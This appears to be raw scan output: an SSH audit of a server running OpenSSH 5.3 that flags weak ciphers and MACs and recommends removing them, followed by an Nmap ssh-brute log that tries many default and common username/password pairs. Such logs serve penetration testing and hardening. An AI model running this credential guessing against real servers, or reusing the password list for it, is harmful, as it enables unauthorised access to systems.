- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:50 EST
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- NSE: [ssh-brute] Trying username/password pair: web:butterfly
- NSE: [ssh-brute] Trying username/password pair: test:butterfly
- NSE: [ssh-brute] Trying username/password pair: root:jordan
- NSE: [ssh-brute] Trying username/password pair: admin:jordan
- NSE: [ssh-brute] Trying username/password pair: administrator:jordan
- NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: guest:jordan
- NSE: [ssh-brute] Trying username/password pair: user:jordan
- NSE: [ssh-brute] Trying username/password pair: web:jordan
- NSE: [ssh-brute] Trying username/password pair: test:jordan
- NSE: [ssh-brute] Trying username/password pair: root:fuckyou
- NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
- NSE: [ssh-brute] Trying username/password pair: user:fuckyou
- NSE: [ssh-brute] Trying username/password pair: web:fuckyou
- NSE: [ssh-brute] Trying username/password pair: test:fuckyou
- NSE: [ssh-brute] Trying username/password pair: root:123123
- NSE: [ssh-brute] Trying username/password pair: admin:123123
- NSE: [ssh-brute] Trying username/password pair: administrator:123123
- NSE: [ssh-brute] Trying username/password pair: webadmin:123123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
- NSE: [ssh-brute] Trying username/password pair: netadmin:123123
- NSE: [ssh-brute] Trying username/password pair: guest:123123
- NSE: [ssh-brute] Trying username/password pair: user:123123
- NSE: [ssh-brute] Trying username/password pair: web:123123
- NSE: [ssh-brute] Trying username/password pair: test:123123
- NSE: [ssh-brute] Trying username/password pair: root:justin
- NSE: [ssh-brute] Trying username/password pair: admin:justin
- NSE: [ssh-brute] Trying username/password pair: administrator:justin
- NSE: [ssh-brute] Trying username/password pair: webadmin:justin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
- NSE: [ssh-brute] Trying username/password pair: netadmin:justin
- NSE: [ssh-brute] Trying username/password pair: guest:justin
- NSE: [ssh-brute] Trying username/password pair: user:justin
- NSE: [ssh-brute] Trying username/password pair: web:justin
- NSE: [ssh-brute] Trying username/password pair: test:justin
- NSE: [ssh-brute] Trying username/password pair: root:liverpool
- NSE: [ssh-brute] Trying username/password pair: admin:liverpool
- NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
- NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: guest:liverpool
- NSE: [ssh-brute] Trying username/password pair: user:liverpool
- NSE: [ssh-brute] Trying username/password pair: web:liverpool
- NSE: [ssh-brute] Trying username/password pair: test:liverpool
- NSE: [ssh-brute] Trying username/password pair: root:football
- NSE: [ssh-brute] Trying username/password pair: admin:football
- NSE: [ssh-brute] Trying username/password pair: administrator:football
- NSE: [ssh-brute] Trying username/password pair: webadmin:football
- NSE: [ssh-brute] Trying username/password pair: sysadmin:football
- NSE: [ssh-brute] Trying username/password pair: netadmin:football
- NSE: [ssh-brute] Trying username/password pair: guest:football
- NSE: [ssh-brute] Trying username/password pair: user:football
- NSE: [ssh-brute] Trying username/password pair: web:football
- NSE: [ssh-brute] Trying username/password pair: test:football
- NSE: [ssh-brute] Trying username/password pair: root:loveme
- NSE: [ssh-brute] Trying username/password pair: admin:loveme
- NSE: [ssh-brute] Trying username/password pair: administrator:loveme
- NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: guest:loveme
- NSE: [ssh-brute] Trying username/password pair: user:loveme
- NSE: [ssh-brute] Trying username/password pair: web:loveme
- NSE: [ssh-brute] Trying username/password pair: test:loveme
